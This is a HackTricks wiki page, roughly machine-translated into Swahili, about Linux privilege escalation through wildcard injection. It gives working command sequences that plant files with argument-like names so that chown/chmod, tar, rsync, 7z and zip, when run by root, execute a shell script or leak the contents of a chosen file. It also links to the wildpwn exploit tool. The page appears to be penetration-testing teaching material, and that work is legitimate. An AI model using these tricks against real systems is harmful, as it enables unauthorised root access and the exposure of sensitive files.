hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

chown, chmod

Unaweza kuonyesha mmiliki wa faili na ruhusa unazotaka nakala kwa faili zingine

touch "--reference=/my/own/path/filename"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (combined attack)
More info in https://www.exploit-db.com/papers/33930

Tar

Tekeleza amri zisizo na mipaka:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack)
More info in https://www.exploit-db.com/papers/33930

Rsync

Teza amri zisizo za kawaida:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine

touch "-e sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack)
More info in https://www.exploit-db.com/papers/33930

7z

Katika 7z hata kutumia -- kabla ya * (kumbuka kwamba -- inamaanisha kuwa ingizo linalofuata haliwezi kut treated kama vigezo, hivyo ni njia za faili tu katika kesi hii) unaweza kusababisha kosa la kiholela kusoma faili, hivyo ikiwa amri kama ifuatayo inatekelezwa na root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Na unaweza kuunda faili katika folda ambapo hii inatekelezwa, unaweza kuunda faili @root.txt na faili root.txt kuwa symlink kwa faili unayotaka kusoma:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Kisha, wakati 7z inatekelezwa, itachukulia root.txt kama faili inayoshikilia orodha ya faili ambazo inapaswa kubana (hiyo ndiyo maana ya kuwepo kwa @root.txt) na wakati 7z inasoma root.txt itasoma /file/you/want/to/read na kwa sababu maudhui ya faili hii si orodha ya faili, itatupa kosa linaloonyesha maudhui.

Maelezo zaidi katika Write-ups ya sanduku CTF kutoka HackTheBox.

Zip

Tekeleza amri zisizo na mipaka:

zip name.zip files -T --unzip-command "sh -c whoami"

{% hint style="success" %} Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

{% endhint %}